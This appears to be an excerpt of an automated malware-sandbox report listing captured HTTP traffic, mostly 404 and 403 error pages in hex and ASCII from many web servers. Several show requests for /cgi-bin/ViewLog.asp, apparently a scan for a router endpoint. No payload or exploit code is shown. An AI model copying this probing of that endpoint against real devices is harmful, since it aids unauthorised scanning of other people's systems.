    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 01 Nov 2021 03:16:29 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 14Content-Type: text/plainData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a Data Ascii: 404 Not Found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Length: 0Date: Mon, 01 Nov 2021 03:26:10 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 767Date: Mon, 01 Nov 2021 03:16:52 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 31 30 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resou
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 01 Nov 2021 03:16:52 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 05:16:50 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDContent-Type: text/htmlContent-Length: 139Server: nginxSet-Cookie: 37aba393e8a1b8e4ad90c8741f5093e8=8117026a-7e36-4293-bfc6-9865fd4e8db5.tFVlSNa-Cjr4U8ROA8-w5lW5fRI; Expires=Wed, 01-Dec-2021 03:16:55 GMT; HttpOnly; Path=/Date: Mon, 01 Nov 2021 03:16:55 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1055Date: Mon, 01 Nov 2021 03:16:10 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 03:16:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Mon, 01 Nov 2021 03:14:10 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 37 30 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.15Date: Mon, 01 Nov 2021 03:17:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 03:17:03 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Oct 2021 19:10:15 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 03:17:17 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: thttpdContent-Type: text/html; charset=utf-8Date: Mon, 01 Nov 2021 03:17:15 GMTLast-Modified: Mon, 01 Nov 2021 03:17:15 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 0a 09 69 66 28 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3d 3d 22 31 39 32 2e 31 36 38 2e 31 2e 31 22 29 7b 0a 09 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2b 22 2f 22 0a 09 7d 65 6c 73 65 7b 0a 09 20 20 20 20 0a 09 7d 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 68 31 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 68 65 69 67 68 74 3a 20 31 35 30 70 78 22 3e 0a 09 09 3c 73 70 61 6e 3e 0a 09 09 09 45 72 72 6f 72 20 34 30 34 2c 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a 09 09 3c 2f 73 70 61 6e 3e 0a 09 3c 2f 68 31 3e 0a 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 3c 2f 61 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <html><head><script>if(location.host=="192.168.1.1"){ location.href="http://"+location.host+"/"}else{ }</script></head><body><h1 style="text-align: center; height: 150px"><span>Error 404, Page not found</span></h1><div style="text-align: center;"><a href="/">Home</a></div></body></html><HR></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: thttpdContent-Type: text/html; charset=utf-8Date: Mon, 01 Nov 2021 03:17:20 GMTLast-Modified: Mon, 01 Nov 2021 03:17:20 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 0a 09 69 66 28 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3d 3d 22 31 39 32 2e 31 36 38 2e 31 2e 31 22 29 7b 0a 09 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2b 22 2f 22 0a 09 7d 65 6c 73 65 7b 0a 09 20 20 20 20 0a 09 7d 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 68 31 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 68 65 69 67 68 74 3a 20 31 35 30 70 78 22 3e 0a 09 09 3c 73 70 61 6e 3e 0a 09 09 09 45 72 72 6f 72 20 34 30 34 2c 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a 09 09 3c 2f 73 70 61 6e 3e 0a 09 3c 2f 68 31 3e 0a 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 3c 2f 61 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <html><head><script>if(location.host=="192.168.1.1"){ location.href="http://"+location.host+"/"}else{ }</script></head><body><h1 style="text-align: center; height: 150px"><span>Error 404, Page not found</span></h1><div style="text-align: center;"><a href="/">Home</a></div></body></html><HR></BODY></HTML>
